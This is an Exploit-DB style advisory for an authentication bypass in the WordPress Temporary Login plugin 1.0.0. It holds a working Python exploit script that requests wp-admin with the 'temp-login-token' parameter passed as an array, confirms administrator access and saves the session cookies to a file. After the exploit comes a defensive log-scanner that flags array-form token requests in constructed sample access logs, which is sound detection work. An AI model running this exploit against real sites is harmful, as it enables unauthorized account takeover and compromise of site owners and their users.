EXPLOITDB 9.8 CRITICAL

WordPress Temporary Login Plugin 1.0.0 – 'temp-login-token' Authentication Bypass to Account Takeover (EDB-ID:52575)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Basic Information

ID EDB-ID:52575
Published May 26, 2026 at 00:00

Affected Product

Affected Versions

# Exploit Title: Wordpress Temporary Login Plugin 1.0.0 - 'temp-login-token' Authentication Bypass to Account Takeover
# Date: 2026-05-02
# Exploit Author: Amir Hossein Jamshidi
# Vendor Homepage: https://wordpress.org
# Software Link: https://downloads.wordpress.org/plugin/temporary-login.1.0.0.zip
# Version: <= 1.0.0
# Tested on: Linux
# CVE : CVE-2026-7567


#!/usr/bin/env python3
import requests

print('''
#################################################################################
# Temporary Login Plugin <= 1.0.0 - 'temp-login-token' Authentication Bypass #
# BY: Amir Hossein Jamshidi #
# Mail: [email protected] #
# github: https://github.com/amirhosseinjamshidi64 #
# Usage: python Exploit.py #
#################################################################################
''')

# Target URL - CHANGE THIS to your WordPress URL
target = input("Enter Target (example: https://evil.com/): ")
url = target + "wp-admin/?temp-login-token[]"
print("[*] Sending exploit request...")
response = requests.get(url, allow_redirects=True)

print(f"[*] Final URL: {response.url}")
print(f"[*] Response status: {response.status_code}")

# Check if we got admin cookies
if 'wp-settings-time' in str(response.cookies):
    print("[✓] SUCCESS! Authentication bypassed!")
    print("[✓] WordPress logged-in cookie found")
    # Try to access admin area with the same session
    admin_check = requests.get(
        response.url.replace('wp-login.php', 'wp-admin/'),
        cookies=response.cookies
    )
    if 'Dashboard' in admin_check.text or 'wp-admin' in admin_check.url:
        print("[✓] Full admin access confirmed!")
        print("[✓] You are now logged in as a temporary user")
    else:
        print("[!] Logged in but no admin access (user may have limited role)")
else:
    print("[-] Exploit failed. Reasons:")
    print(" - Plugin not installed or not version 1.0.0")
    print(" - No temporary users exist")
    print(" - Plugin is patched")
# Save cookies for manual browsing
with open('wordpress_cookies.txt', 'w') as f:
    for cookie in response.cookies:
        f.write(f"{cookie.name}={cookie.value}\n")
print("[*] Cookies saved to wordpress_cookies.txt")
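
For defenders: the request above passes `temp-login-token` in array form (`temp-login-token[]`) instead of as a single string value, and that shape can be searched for in web server access logs. The following is an added example, not part of the original exploit or the plugin's code; it assumes Combined Log Format, and the sample lines, addresses and token value are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
PARAM = "temp-login-token"


def array_token_params(target):
    """Return query keys that pass temp-login-token in array form."""
    query = urlsplit(target).query
    hits = []
    # parse_qsl percent-decodes keys, so %5B%5D is seen as [] as well.
    for key, _value in parse_qsl(query, keep_blank_values=True):
        base, bracket, _rest = key.partition("[")
        if base == PARAM and bracket:
            hits.append(key)
    return hits


def scan(lines):
    """Return one finding per log line that carries an array-form token."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        keys = array_token_params(m["target"])
        if keys:
            findings.append({"ip": m["ip"], "time": m["time"],
                             "status": int(m["status"]), "keys": keys})
    return findings


# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [02/May/2026:10:01:11 +0000] "GET /wp-admin/?temp-login-token[] HTTP/1.1" 302 0 "-" "python-requests/2.31"',
    '198.51.100.7 - - [02/May/2026:10:01:12 +0000] "GET /wp-admin/?temp-login-token%5B%5D= HTTP/1.1" 302 0 "-" "curl/8.5"',
    '203.0.113.20 - - [02/May/2026:10:02:40 +0000] "GET /wp-admin/?temp-login-token=3f9a1c0de4 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.21 - - [02/May/2026:10:03:05 +0000] "GET /wp-login.php HTTP/1.1" 200 4211 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} keys={f['keys']}")
```

A hit shows only the request shape, not whether a session was issued; correlate flagged requests with subsequent activity by temporary users on sites running version 1.0.0 or earlier.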
